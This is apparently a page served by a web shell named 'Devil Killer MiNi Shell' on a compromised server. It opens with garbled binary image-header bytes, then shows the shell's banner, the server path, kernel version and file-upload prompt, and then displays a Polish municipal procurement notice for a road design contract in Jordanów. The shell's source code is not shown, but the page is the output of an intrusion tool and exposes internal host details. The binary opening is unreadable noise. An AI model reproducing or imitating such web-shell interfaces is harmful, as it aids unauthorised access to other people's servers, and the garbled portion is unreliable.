JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241210/0064427701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej dla zadania - Rozbudowa drogi gminnej nr 440514K oraz 440529K (ul. Zagrody) w m. Jordanów wraz z niezbędną infrastrukturą oraz pełnienie nadzoru autorskiego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Jordanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491893227</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jordanów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">miasto@jordanow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.jordanow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej dla zadania - Rozbudowa drogi gminnej nr 440514K oraz 440529K (ul. Zagrody) w m. Jordanów wraz z niezbędną infrastrukturą oraz pełnienie nadzoru autorskiego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7149ac5f-9040-4e84-a4bd-450cbf2d57d8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00644277</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00062199/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Opracowanie dokumentacji projektowej dla zadania „Rozbudowa drogi gminnej nr 440514K oraz 440529K (ul. Zagrody) w miejscowości Jordanów w km 0+000 do km 2+129 wraz z niezbędną infrastrukturą</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7149ac5f-9040-4e84-a4bd-450cbf2d57d8 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">za pośrednictwem Platformy e-Zamówienia (https://ezamowienia.gov.pl/pl/) oraz w<br/>uzasadnionych przypadkach poczty elektronicznej: miasto@jordanow.pl<br/>uzasadnionych przypadkach poczty elektronicznej: miasto@jordanow.pl<br/>3</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z Rozdziałem XIII.SPOSÓB<br/>KOMUNIKACJI ORAZ WYJAŚNIENIA TREŚCI SWZ<br/>W postępowaniu o udzielenie zamówienia publicznego komunikacja z Zamawiającym a wykonawcami odbywa się przy użyciu<br/>Platformy e-zamówienia, która jest dostępna pod adresem https://ezamówienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „Rozporządzenie”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Miasto Jordanów reprezentowane przez Burmistrza Miasta Jordanowa z<br/>siedzibą przy ul. Rynek 1, 34-240 Jordanów. Z administratorem – można skontaktować się poprzez adres email miasto@jordanow.pl<br/>lub pisemnie na adres siedziby administratora.<br/>2. W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych pod adresem<br/>e-mail: inspektor@cbi24.pl<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>4. Dane osobowe będą przetwarzane zgodnie z art. 78 ust. 1 i 4 ustawy z dnia 11 września 2019 r.– Prawo zamówień publicznych<br/>(Dz. U. z 2019 r. poz. 2019), zwanej dalej PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy.<br/>5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z przepisami PZP.<br/>6. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 oraz art. 74 ust. 4 PZP.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z PZP.<br/>8. Osoba, której dane dotyczą ma prawo do:<br/>1) dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania,<br/>2) w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia wniesienia skargi do organu<br/>nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa,<br/>9. Osobie, której dane dotyczą nie przysługuje:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>3) na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych.<br/>10. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie<br/>dużego wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>11. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z Pzp, jak również nie może naruszać integralności protokołu oraz<br/>jego załączników.<br/>12. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>13. W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień Publicznych, prawa, o których<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze żądania skierowanego do Administratora.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia danych osobowych, o którym mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z Pzp, jak również nie<br/>może naruszać integralności protokołu oraz jego załączników.<br/>2. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IRG.271.1.15.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Opis przedmiotu zamówienia:<br/>1)	Przedmiotem zamówienia jest Opracowanie kompleksowego wielobranżowego projektu budowlanego tj. Projektu zagospodarowania terenu, projektu architektoniczno budowlanego i technicznego wraz z przedmiarem robót i kosztorysem inwestorskim oraz specyfikacją techniczną wykonania i odbioru robót budowlanych, dla zadania „Rozbudowa drogi gminnej nr 440514K oraz 440529K (ul. Zagrody) w miejscowości Jordanów w km 0+000 do km 2+129 wraz z niezbędną infrastrukturą” i dodatkowymi odcinkami dróg ( sięgaczami ) położonymi na działkach ewid 5699 długości 120m, 5689 długości 100m, wydłużeniem opracowania odcinka drogi nr 440514 K o długość 110 m wraz z niezbędnymi uzgodnieniami branżowymi, decyzjami i opiniami oraz uzyskaniem prawomocnej decyzji o zezwoleniu na realizację inwestycji drogowej na podstawie załączonej koncepcji jako materiału pomocniczego oraz pełnienie kompleksowego nadzoru autorskiego<br/>2)	Zakres przedmiotu zamówienia obejmuje:<br/>a.	Karta informacyjna przedsięwzięcia lub raport oddziaływania (w zależności od potrzeb) na środowisko wraz z uzyskaniem decyzji o środowiskowych uwarunkowaniach<br/>b.	Kompletny wniosek o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej <br/>c.	Projekt podziału nieruchomości zgodnie zaprojektowanym zakresem<br/>d.	Projekt budowlany tj. Projekt zagospodarowania terenu i projekt architektoniczno budowlany branży drogowej oraz branży infrastruktury kolidującej z przedsięwzięciem (sieć teletechniczna, gazowa, elektroenergetyczna, wodociągowa); <br/>e.	Projekty techniczne branży drogowej <br/>f.	Projekty techniczne branży teletechnicznej – przebudowa kolizji<br/>g.	Projekty techniczne branży sieci gazowej– przebudowa kolizji<br/>h.	Projekty techniczne branży sieci elektroenergetycznej– przebudowa kolizji budowa oświetlenia solarnego<br/>i.	Projekty techniczne branży sieci wodociągowej – przebudowa kolizji<br/>j.	Operat wodno prawny wraz z uzyskaniem decyzji o pozwoleniu wodno prawnym<br/>k.	Projekt zieleni (inwentaryzacja zieleni, projekt nasadzeń w razie konieczności)<br/>l.	Dokumentacja geotechniczna <br/>m.	Projekt stałej organizacji ruchu<br/>n.	Specyfikacje techniczne wykonania i odbioru robót budowlanych; <br/>o.	Przedmiary robót; <br/>p.	Kosztorysy inwestorskie; <br/>q.	Przygotowanie materiałów niezbędnych do wniosku o zezwolenie na realizacje inwestycji drogowej wraz z uzyskaniem decyzji ZRiD zgodnie z zasadami i warunkami podanymi w Ustawie z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (t .j. Dz. U. z 2024 r. poz. 311 ze zm.).<br/>r.	Opracowanie czasowej organizacja ruchu na czas budowy, <br/>s.	Opracowanie stałej organizacji ruchu<br/><br/>2.	Przedmiot zamówienia określony w pkt. 3. obejmuje także:<br/>a)	sporządzenie kompletnego wniosku o wydanie zamiennego pozwolenia na budowę i uzyskanie decyzji– pozwoleń koniecznych do realizacji projektowanego przedsięwzięcia w imieniu Zamawiającego na podstawie odrębnych pełnomocnictw, w tym, m.in.: decyzji ostatecznej o udzieleniu pozwolenia na budowę, w tym także dokonywanie wszelkich korekt i uzupełnień składanych wniosków i projektów – na wniosek organów wydających decyzje administracyjne;<br/>b)	udział w postępowaniu o udzielenie zamówienia publicznego na wykonanie robót budowlanych w charakterze konsultanta, do którego obowiązków będzie należało przygotowywanie odpowiedzi na ewentualne zapytania wykonawców o wyjaśnienie treści SWZ w zakresie opisu przedmiotu zamówienia, przygotowywanie projektów odpowiedzi na pytania zadane przez wykonawców w toku postępowania. Powyższe dotyczy kolejnych postępowań w sytuacji, gdy pierwsze postępowanie zostanie unieważnione;<br/>c)	pełnienie nadzoru autorskiego w trakcie realizacji inwestycji.<br/>3.	Szczegółowy opis przedmiotu zamówienia zawiera OPZ stanowiący Załącznik nr 2 do SWZ<br/>4.	Wymagany okres gwarancji jakości na Przedmiot umowy wynosi 24 miesięcy . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Oferty zostaną ocenione przez zamawiającego w oparciu o następujące kryteria i ich znaczenie:<br/>1)	Cena – 60% - 60pkt<br/>W przypadku kryterium „Cena” oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą z działania:<br/>C min<br/>P (C) = ------------------------ x Max (C) <br/>C<br/>gdzie<br/>P (C) – ilość punktów jakie otrzyma oferta badana w kryterium „Cena”<br/>C – cena oferty badanej<br/>Cmin – cena oferty z najniższą ceną<br/>Max (C) – maksymalna ilość punktów, jakie może otrzymać oferta za kryterium „Cena”<br/>2).G - długość oferowanego okresu gwarancji jakości na przedmiot umowy - 40% <br/>Sposób oceny: <br/>Zaproponowany okres gwarancji jakości 24 miesiące – 0 pkt <br/>Zaproponowany okres gwarancji jakości 30 miesięcy – 20 pkt <br/>Zaproponowany okres gwarancji jakości 36 miesięcy – 40 pkt <br/>Oferty zawierające okres gwarancji jakości krótszy niż 24 miesiące zostaną odrzucone jako nie spełniające wymagań SWZ. <br/>Za nie wskazanie w formularzu oferty długości okresu gwarancji jakości, wykreślenie tylko jednego okresu gwarancji jakości lub wykreślenie wszystkich wskazanych okresów gwarancji jakości (24, 30, 36) w formularzu oferty, oferta nie otrzyma dodatkowych punków w tym kryterium oceny ofert. W takim przypadku Zamawiający przyjmuje, że Wykonawca zaproponował najkrótszy okres gwarancji jakości tj. 24 miesiące. <br/>Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania określone w SWZ oraz otrzyma największą liczbę punktów. <br/>Zamawiający przyjmuje, że 1 pkt = 1%. <br/>N=C+G gdzie: <br/>N - łączna ilość punktów badanej oferty <br/>C - ilość punktów badanej oferty w kryterium cena brutto <br/>G - ilość punktów badanej oferty w kryterium długość oferowanego okresu gwarancji jakości na przedmiot umowy <br/>2.	Oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, którego oferta uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość oferowanego okresu gwarancji jakości na przedmiot umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu. <br/>2.	udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>3)	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>4)	zdolności technicznej lub zawodowej: Wykonawca spełni warunek, jeżeli wykaże że: <br/>a)	w okresie ostatnich 3 lat, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, wykonał co najmniej dwa opracowania dokumentacji projektowej dotyczące budowy lub przebudowy układu drogowego na kwotę co najmniej 200 000 zł brutto każde .<br/>b)	dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia tj. osobami posiadającymi wykształcenie i kwalifikacje zawodowe z uprawieniami budowlanymi do projektowania:<br/>i.	jedną osobę posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń– która będzie pełniła funkcję projektanta branżowego;<br/>ii.	jedną osobę posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń– która będzie pełniła funkcję projektanta branżowego;<br/>iii.	osobę posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń – która będzie pełniła funkcję projektanta branżowego;<br/>iv.	osobę posiadającą uprawnienia budowlane do projektowania w specjalności drogowej bez ograniczeń – która będzie pełniła funkcję projektanta branżowego;<br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców. <br/>4.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 7 do SWZ;</span> </h3> <h3 